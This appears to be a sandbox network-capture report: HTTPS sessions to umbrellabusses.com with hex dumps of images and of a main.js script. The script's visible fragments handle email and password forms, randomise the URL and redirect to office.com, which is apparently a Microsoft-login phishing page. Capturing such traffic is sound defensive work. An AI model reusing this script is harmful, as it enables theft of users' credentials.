                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        73192.168.2.549986104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC623OUTGET /samhentir/img/pf.png HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/css/main.css
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1008INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:06 GMT
                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:19:32 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef384-1757b"
                                                                                                                                                                                                                        Expires: Thu, 06 Feb 2025 10:58:04 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 269702
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZzRWHR6ZPuKd%2F%2BA%2FRauR3KfeTPwpzOIQLs2d9ocMKX1KeTjdX6CJmnsUQfjk%2FYh%2BTGQdVW4O5is9v2wTx8sksekTGEmw10X%2FQdbt%2FB%2ByqRVQnmELj3apmxcw0tUORptkPrNSlGo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26be0f1dc481-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1639&rtt_var=628&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1201&delivery_rate=1722713&cwnd=236&unsent_bytes=0&cid=885b1d2a2a98dd05&ts=137&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC361INData Raw: 33 61 36 30 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 96 00 00 02 11 08 06 00 00 00 69 a5 9b 6b 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec bd 07 98 25 55 9d 36 fe 9e 73 2a dc ba a1 c3 f4 44 d2 c0 c0 62 06 03 22 49 10 45 d1 11 c1 38 06 94 20 ae e8 ae ba fa 3d fb d7 6f 83 bb ee ae 6e 34 a3 80 c8 aa eb ea e7 9a 11 44 04 94 91 cc c2 90 83 30 4c 0e 3d dd d3 e1 f6 8d 95 ab fe cf ef d4 ad ee db c3 74 f7 4c 87 e9 db 7d 4f 3d 33 4f a7 0a a7 de 73 aa de fb 4b ef 8f 41 6d 0a 01 85 80 42 40 21 a0 10 98 45 04 d8 2c 9e 4b 9d 4a 21 a0 10 50 08 28 04 14 02 50 c4 a2 16 81 42 40 21 a0 10 50 08 cc 2a 02 8a 58 66 15 4e 75 32 85 80 42 40 21 a0 10 50 c4 a2 d6 80 42 40 21 a0 10 50 08 cc 2a 02 8a 58 66 15 4e 75 32 85 80 42 40 21
                                                                                                                                                                                                                        Data Ascii: 3a60PNGIHDRiksRGB IDATx^%U6s*Db"IE8 =on4D0L=tL}O=3OsKAmB@!E,KJ!P(PB@!P*XfNu2B@!PB@!P*XfNu2B@!
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 2a 95 88 60 36 4d 73 f4 5a 86 31 24 bf 1f 1a 32 e4 57 c3 48 be 36 6f 9e e7 c5 93 4d cf fe 8e d1 75 7d d6 ef 07 18 92 c3 f0 fd 8e 49 c7 33 d9 58 a7 ba 97 43 bd 0c 67 73 3c ab 0e f5 e0 17 d1 f5 86 f6 b3 ee f7 bd bd 95 8d 5f 0c 1f c0 be fb 1e 3b d5 f3 e0 fb fe b4 d7 34 5d 6b df f3 6b 9a 26 9f 3f 4d ab 30 a0 fb 39 33 15 04 41 4c ff 33 99 4c b8 77 ef de f0 4d 6f 7a 93 cf 18 93 ef 07 b5 2d 2e 04 66 f4 22 8e e3 98 dd 7b ef bd dd 8c b1 0e 4d 8b bb 0d 2e ba 9d 20 ec cc e8 7a 81 69 3c 13 07 71 46 d3 78 17 18 33 e3 18 1a e3 4c 63 8c 89 18 b1 60 4c 08 c6 62 0e 80 33 c6 46 c7 11 c7 71 8c 28 8a e3 64 c1 d1 0e 71 2c ff 21 06 4b 24 68 18 e4 1f e9 7b 79 42 fa ca 92 5f b3 08 11 63 51 e3 7c f2 37 63 b7 38 ee 87 c6 3c 46 8c 8f c3 80 0e 1e 37 c5 13 2c fb 18 48 1f ca e4 2b 8d
                                                                                                                                                                                                                        Data Ascii: *`6MsZ1$2WH6oMu}I3XCgs<_;4]kk&?M093AL3LwMoz-.f"{M. zi<qFx3Lc`Lb3Fq(dq,!K$h{yB_cQ|7c8<F7,H+
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 81 01 70 30 38 8e 03 53 d7 61 59 16 86 87 46 ec 42 47 61 c3 d6 2d db bf ec 17 eb b7 9f 77 e1 85 8a 5c 66 05 f9 b9 3d c9 a4 c4 42 6e 30 43 44 eb d6 1c b3 e6 f3 b5 7a e5 68 ca c9 27 57 18 15 3f 79 61 90 b8 c2 a6 28 30 9c db e1 ab b3 2b 04 14 02 0b 19 01 23 a3 cb a0 3d 91 08 b9 c0 4c dd 48 8a 2b 1b ee f6 42 be 93 08 c7 66 c0 c3 c5 a1 91 2f 7b 70 d6 bf f1 8d eb 86 17 f2 3d b7 c3 d8 27 25 16 2a 86 5c da 55 f8 6c 3e 9f fd 90 a6 8b 2e 49 22 8d ec e2 a4 18 8a b6 a9 44 3d da 01 46 75 8f 0a 01 85 c0 74 10 08 e3 40 ba c2 28 ce 42 ee 75 92 a8 09 c3 10 54 f0 2f 09 26 8c e5 df 03 cf af d7 6a ce e3 c5 81 bd 5f 0d b4 f8 16 45 2e d3 41 fb d0 1d 33 85 c5 b2 7e 69 4f d7 ca 2b b2 d9 cc db 85 10 86 94 f1 62 91 9c f0 28 0a 1a b2 0d 8a 58 0e dd 74 a9 2b 29 04 16 17 02 53 11 4b
                                                                                                                                                                                                                        Data Ascii: p08SaYFBGa-w\f=Bn0CDzh'W?ya(0+#=LH+Bf/{p='%*\Ul>.I"D=Fut@(BuT/&j_E.A3~iO+b(Xt+)SK
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: ef d0 37 dc 90 3d a4 c8 65 ee 57 d8 54 c4 f2 81 7c 21 f7 cf 9c b1 1e 6a 21 4a 1b a5 1b d3 46 e9 c6 b4 a9 3a 96 b9 9f 24 75 05 85 c0 e2 44 60 e6 c4 32 31 2e c9 0b 8a 41 24 85 95 51 34 58 a9 54 6f dd b1 7b f7 55 d5 6a f0 c0 a5 97 5e ea 2c 4e 4c 5b e3 ae 26 25 96 55 4b 3b 2f ca e5 0b 5f 50 c4 d2 1a 93 a5 46 a1 10 58 5c 08 cc 3d b1 50 75 3e 59 33 64 c5 54 ab d5 c1 7a bd 7e d3 de a1 a1 ab c4 d6 be 87 d6 7e e2 13 ee e2 c2 b3 75 ee 46 11 4b eb cc 85 1a 89 42 a0 cd 10 98 39 b1 ec eb 31 49 3d 29 29 90 94 7e 1c 04 81 d4 35 a4 3a 97 52 a9 34 a0 e9 da 6f 37 3d bd e9 8a 90 e7 1e 5d b7 6e 9d d7 66 a0 1f 92 db 9d 8a 58 2e ce e5 0b 9f 57 16 cb 21 99 0b 75 11 85 40 9b 21 30 fb c4 d2 ec a6 6f 38 eb 65 ac 85 24 f7 73 b9 9c fc 55 a5 52 19 08 3c ff 86 8d cf 3c 7b 8d c8 74 3f
                                                                                                                                                                                                                        Data Ascii: 7=eWT|!j!JF:$uD`21.A$Q4XTo{Uj^,NL[&%UK;/_PFX\=Pu>Y3dTz~~uFKB91I=))~5:R4o7=]nfX.W!u@!0o8e$sUR<<{t?
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 2d fb f3 ac 95 f9 6b 45 2c 0b f1 a1 55 63 56 08 b4 3a 02 ad 41 2c 53 f5 73 49 0a 28 f5 d1 7e 2e 24 c3 4f 44 33 32 52 da ed 39 fe 2f b6 6e de 76 f5 ba f7 7f f0 a9 56 47 fb 50 8e 6f 72 62 59 b1 ec 63 d9 5c e6 af 14 b1 1c ca 29 51 d7 52 08 b4 0b 02 f3 4f 2c 07 db cf 85 74 c5 c8 72 d1 18 97 fd 5c 86 07 47 76 72 2e 7e b4 75 e7 ee ef bd ed 6d ef 7e 9a b1 7d a3 36 ed 32 97 e3 ef 73 52 62 39 6a c5 b2 8f 5b 39 eb af 18 63 79 e5 0a 6b cf 05 b2 d8 ef ba d9 9f 3e d9 2b 81 c7 00 d5 3c cc d6 46 e7 a3 6d 36 cf 39 5b 63 3b 74 e7 99 7f 62 39 90 7e 2e a9 c5 42 84 42 f1 16 d9 db c5 f5 1a fd 5c 2c 0c 0e 15 77 d6 eb f6 cf 87 07 86 ae 75 22 ed 69 15 73 01 26 27 96 c3 96 7f c2 ca 64 fe af 22 96 43 f7 a8 a9 2b 1d 1c 02 e9 0b 7a df a3 26 7a 61 8f 0f cc 52 a0 76 2c a9 87 88 85 c5
                                                                                                                                                                                                                        Data Ascii: -kE,UcV:A,SsI(~.$OD32R9/nvVGPorbYc\)QRO,tr\Gvr.~um~}62sRb9j[9cyk>+<Fm69[c;tb9~.BB\,wu"is&'d"C+z&zaRv,
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 5a 6e 83 59 98 e8 16 17 be 2b 6c aa ca fd fd f4 73 e9 d3 b8 b8 61 f3 b3 db bf d9 bd e2 88 45 eb 16 9b 8a 58 a8 f2 fe af 94 c5 d2 c6 cf fe 02 bf f5 fd 11 cb a8 b5 41 81 fb 28 82 a1 69 d0 88 2c fc 00 8c 04 06 c1 a0 51 16 69 1c 82 85 11 b8 e0 80 d0 12 b3 23 06 e2 28 94 14 11 c5 31 f4 8c 85 ba e7 c3 a1 b4 53 c3 40 64 68 f0 93 56 b6 d2 aa 49 eb 5c d2 2c 32 49 42 14 d0 8f a9 f2 7e 81 83 3b e3 e1 2f 3e 62 49 e6 b7 19 98 fd f5 73 a9 f6 07 7e f0 cb 4d 1b b7 7e bb 54 f7 1f 5f 8c 6e b1 03 21 16 b2 58 72 2a c6 32 e3 a7 48 9d 60 0e 10 d8 57 93 6b df 4f 90 f4 72 97 2e a9 7d 2d 15 fa 3d 8b c0 10 22 f2 3d 84 b6 0d 11 44 e8 10 06 74 cd 00 5c 1f b0 6d 54 77 f5 a2 3a 52 44 7f ef 5e 8c 14 87 10 83 63 d9 f2 1e ac 3e ea 18 e4 0f 5b 01 74 77 03 d9 0c 02 16 a1 ea fb f0 74 06 91
                                                                                                                                                                                                                        Data Ascii: ZnY+lsaEXA(i,Qi#(1S@dhVI\,2IB~;/>bIs~M~T_n!Xr*2H`WkOr.}-="=Dt\mTw:RD^c>[twt
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 72 3f 7e f0 ec 4b 2f 75 66 7e 9d 43 7b 06 45 2c 87 16 6f 75 b5 59 44 40 be e8 65 3d 48 e2 c2 92 c1 79 b2 5a 1a 56 06 5d 8a aa e0 7b 72 1d e0 c3 25 3c 72 d3 2d 78 f6 b6 db b1 d2 b4 10 97 cb e8 b0 4c b8 be 23 2b ee 89 5c 24 11 35 ac 92 b4 8f 3d b9 bc d2 cc 9f 66 8d 2f 22 16 da a7 16 f9 52 1b 4c f3 81 ae ce 25 e8 af d7 50 33 75 94 4c 03 a7 bf f5 cd 38 f2 c4 97 00 1d 39 54 00 94 03 0f c2 d4 01 4a 41 f6 43 e8 5c c8 4c b3 f6 dd 94 c5 12 c7 a1 8c b1 50 3f 17 b2 5c b2 d9 1c 11 0b 18 c4 40 b5 6a df da d7 bb e7 0a 27 e4 8f ae 5b b7 ce 5e 48 eb 44 11 cb 42 9a 2d 35 d6 71 08 a4 c4 42 d6 85 b4 58 a4 8b 2a 92 55 f3 32 ca 42 ae ad 38 82 15 c6 60 fd 83 f8 e9 57 af c4 91 10 f0 fb fb b1 b4 a3 80 5a bd 02 61 8c a9 0b 93 53 8a ce 45 16 0b 6d d2 62 89 92 38 0b 7d 9f 66 74 d1
                                                                                                                                                                                                                        Data Ascii: r?~K/uf~C{E,ouYD@e=HyZV]{r%<r-xL#+\$5=f/"RL%P3uL89TJAC\LP?\@j'[^HDB-5qBX*U2B8`WZaSEmb8}ft
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 6a c8 e4 33 0d 6e c6 c4 0e 04 38 ff e3 97 83 1f 73 18 6a 59 13 b6 8c eb 30 88 74 bf 59 41 63 a1 9d 44 11 4b f3 87 8a fd e7 71 24 96 9b e3 38 32 c8 4f 12 30 b5 5a ad 18 04 c1 ad cf 3e bb f5 9a 8e 25 fc be 73 cf 6d 3d b7 98 22 96 85 f6 2c aa f1 8e 43 80 88 25 9b cd a2 56 b5 a5 54 3d a8 93 a3 e7 61 09 13 30 ca 55 dc 79 f5 7f c1 dd b2 1d dd 0c f0 ec 1a 84 49 ae 16 1f 06 37 10 78 0e 34 0a be eb d4 9c 8b 0e 0b 60 70 13 56 be 80 10 0c 25 cf 46 31 72 71 c4 d1 ab 51 2d 8f c0 af d5 90 27 32 a0 5e f6 82 c3 a9 db d0 75 73 9c 90 24 05 f5 69 23 97 9a 24 17 92 ea 40 84 41 53 c3 09 6f 7e 3d 8e 39 eb 74 94 4d 0d 9e 26 e0 33 f2 c2 8d a5 3b b7 df d4 2a 62 99 4a 6b 4c 26 a6 c4 31 0c a1 49 b7 6d ce ca 26 75 2e 8c 15 eb 35 7b 7d ef 9e a1 2b 8a 15 fb 81 8b 5a 2c e6 a2 88 a5 fd
                                                                                                                                                                                                                        Data Ascii: j3n8sjY0tYAcDKq$82O0Z>%sm=",C%VT=a0UyI7x4`pV%F1rqQ-'2^us$i#$@ASo~=9tM&3;*bJkL&1Im&u.5{}+Z,
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: b7 ee 99 94 58 e2 30 69 d2 a7 e5 0a 28 79 01 1c dd 40 cf 8b 5f 80 57 bc f7 5d 08 0a 39 84 ba 81 62 b5 8c ae 25 5d 60 95 0a 4c 27 c0 5d df fe 0e dc 6d bb 61 da 0e 0c d2 fd a2 ca ff fd 10 0b 9d 97 62 3f 3c 63 a2 1a 44 92 58 4e be f4 bd 58 fe 8a 13 31 42 1d 27 75 5d 5a 51 ca 62 51 16 cb b4 1f 25 41 ca 40 24 5c 99 88 59 46 7e 48 82 96 23 9c 69 b7 3d bb 71 d3 b7 85 d9 71 f7 7c 90 8b 22 96 69 cf a8 3a b0 15 10 d0 18 87 17 06 b2 3e 25 f0 3c e4 84 0e 2b 0c a1 57 ea f8 e5 d7 af 42 61 f7 d0 28 b1 50 44 23 dd 12 df 36 fd 1c 35 88 29 0b 9b 31 94 74 1d af 7a db f9 58 7a da c9 28 b3 18 c2 b4 e0 86 01 f5 e6 82 19 86 c8 7a 01 9e b9 e9 66 6c 59 7f 0f 0a 7e 08 23 a2 46 61 93 13 8b b0 32 a8 f8 21 ca 05 0b af b8 e4 3d 58 f1 f2 13 50 f2 42 2a e1 07 f5 e3 50 c4 a2 88 65 ba cf
                                                                                                                                                                                                                        Data Ascii: X0i(y@_W]9b%]`L']mab?<cDXNX1B'u]ZQbQ%A@$\YF~H#i=qq|"i:>%<+WBa(PD#65)1tzXz(zflY~#Fa2!=XPB*Pe
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: a2 a2 4c 12 fe ed bb 29 62 99 fb b9 67 d2 e2 26 65 64 99 2d 16 83 2c 97 72 14 85 b7 6f da bc e3 5b 56 be e7 ce b9 88 b9 28 62 99 fb 99 55 57 98 43 04 d2 3a 96 48 03 34 ce a0 05 b1 b4 58 8c ba 83 2d b7 df 83 6d 37 ad 9f 94 58 48 d4 cf 8b 62 c4 ba 86 41 4d e0 95 17 ad 43 cf 89 2f 42 4d e8 80 65 c1 0f 80 90 c8 8b b4 c2 44 52 b7 92 77 02 fc f6 6f ff 05 9d e5 ba 94 84 a1 fa 98 89 5c 61 d4 e7 85 ce ed 31 81 72 21 8b f3 fe e9 af 51 e2 31 3c cd 50 c4 42 75 44 ca 15 36 a3 a7 63 aa 7e 2e a4 dc 4d 9b a9 e9 32 5b cc b2 2c d9 cf 45 30 5e 76 1c f7 ae be fe 91 af 0f 8d 54 ef 9d 6d b7 98 22 96 19 4d ab 3a 78 be 11 20 62 71 7c 0f cc 14 a0 2e f3 22 8c 65 1d 8b 69 bb 18 78 e8 71 3c fa 93 5f 49 62 21 ad 30 49 00 71 a3 c3 63 c3 6a 21 62 f1 e3 08 3e e3 18 c9 1a 58 73 de eb 70
                                                                                                                                                                                                                        Data Ascii: L)bg&ed-,ro[V(bUWC:H4X-m7XHbAMC/BMeDRwo\a1r!Q1<PBuD6c~.M2[,E0^vTm"M:x bq|."eixq<_Ib!0Iqcj!b>Xsp


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        74192.168.2.549985104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC362OUTGET /samhentir/js/main.js HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:06 GMT
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 16:07:16 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675efeb4-e28"
                                                                                                                                                                                                                        Expires: Fri, 10 Jan 2025 21:46:03 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 14823
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WPoSMdnIS6H18q%2Fh%2FW2ffHX9trvuPNohyfD%2BSgJZnc1Ao2X4LNjPHwV4HY%2F2Ihohu5H1iJU5MYNsePPW0f2zfLQzrPffPn0VuvG2JteDL6V66Ow1ibz1BKZ%2FIXBuro1%2FOs9f8Bo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26be2d5c4238-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1584&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=940&delivery_rate=1759036&cwnd=244&unsent_bytes=0&cid=b534eadf11f10684&ts=139&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC358INData Raw: 65 32 38 0d 0a 20 63 6f 6e 73 74 20 63 6f 6e 74 61 69 6e 65 72 31 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 63 6f 6e 74 61 69 6e 65 72 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 63 6f 6e 74 61 69 6e 65 72 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 63 6f 6e 74 61 69 6e 65 72 32 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6d 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6d 69 6e 70 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 72 72 6f 72 54 65 78 74 42 6f 78 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 65 72 72 6f 72 54 65 78 74 42 6f 78 22
                                                                                                                                                                                                                        Data Ascii: e28 const container1 = document.querySelector(".container"); const container2 = document.querySelector(".container2"); const emText = document.querySelector(".minp"); const errorTextBox = document.querySelector(".errorTextBox"
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 65 63 74 6f 72 28 22 2e 70 61 46 6f 72 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6d 69 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 65 6d 69 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 70 61 49 6e 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 70 61 49 6e 70 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 62 61 63 6b 62 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 62 61 63 6b 62 74 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 72 72 6f 72 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 65 72 72 6f 72 32 22 29 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                        Data Ascii: ector(".paForm"); const emi = document.querySelector(".emi"); const paInp = document.querySelector(".paInp"); const backbt = document.querySelector(".backbt"); const error2 = document.querySelector(".error2");
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1369INData Raw: 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 75 72 6c 2e 74 6f 53 74 72 69 6e 67 28 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 7d 0d 0a 0d 0a 0d 0a 0d 0a 74 75 72 6e 55 72 6c 54 6f 52 61 6e 64 6f 6d 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 65 6d 46 6f 72 6d 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 20 28 65 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6d 20 3d 20 65 2e 74 61 72 67 65 74 2e 65 6c 65 6d 65 6e 74 73 2e 65 6d 2e 76 61 6c 75 65 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 6d 20 3d 3d 3d 20 22 22 29 20
                                                                                                                                                                                                                        Data Ascii: window.location.replace(url.toString()); }}turnUrlToRandom(); emForm.addEventListener("submit", (e) => { e.preventDefault(); const em = e.target.elements.em.value; if (em === "")
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC535INData Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 2f 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 65 6d 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 75 70 22 2c 20 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 72 72 6f 72 54 65 78 74 42 6f 78 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 65 22 29 3b 0d 0a 20 20
                                                                                                                                                                                                                        Data Ascii: window.location.href = "https://www.office.com/"; } }, 1000); } }); emi.addEventListener("keyup", () => { errorTextBox.classList.add("hide");
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        75192.168.2.549988104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC364OUTGET /samhentir/img/good.png HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1002INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:06 GMT
                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:25:20 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef4e0-1ea6"
                                                                                                                                                                                                                        Expires: Sat, 08 Feb 2025 08:24:11 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 106135
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8apURB1w7%2B3LZA%2Fd0i2o7d6bwRdd0CvqANMR04qjZRoRRb%2FzcGQzMdNv%2FjJVz0V7dfUzvZTUXdaCzH6l1cT5bVAhBr6AF9AQTQ3zrRx2sxHiWRJb9J5EYBXF4%2F3ufB1%2FpRQ50qQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
